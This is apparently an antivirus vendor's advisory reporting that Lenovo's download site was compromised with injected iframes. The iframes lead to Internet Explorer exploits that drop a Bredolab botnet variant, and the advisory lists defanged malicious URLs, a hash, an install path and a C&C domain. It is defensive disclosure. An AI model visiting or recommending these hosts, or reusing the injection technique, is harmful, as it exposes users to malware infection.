Lenovo’s download site has been infected with malicious codes since Sunday’s afternoon, June 20th; so users should be careful on visiting this site. Currently, if you access this site with Chrome or Firefox, you will see a warning as following:
Chrome’s warning of malicious code on Lenovo’s download site
Many web pages on Lenovo’s download site are appended with an iframe which leads users to hxxp://volgo-marun.cn/pek/index.php
Malicious code appended to web pages
Decoding the iframe, we find many vulnerabilities in Internet Explorer have been taken advantage to launch the attack.
These exploit codes attempt to load file hxxp://volgo-marun.cn/pek/exe.exe which is a virus, onto victim’s computer.
The virus is a new variant of Bredolab Botnet with following MD5: F5A44C63F8777F544931ABC763F88EE3
After being loaded onto the computers, the virus copies itself as %Programs%\Startup\monskc32.exe and receives commands from C&C server with domain sicha-linna8.com.
Bredolab Botnet receives commands from C&C server
For the time being, the scan result on Virus Total shows that only 10/40 AVs can detect this virus variant.
Bkav’s users can be worry-free since this virus has already been updated in our antivirus software’s database.
Le Minh Hung
Senior Security Researcher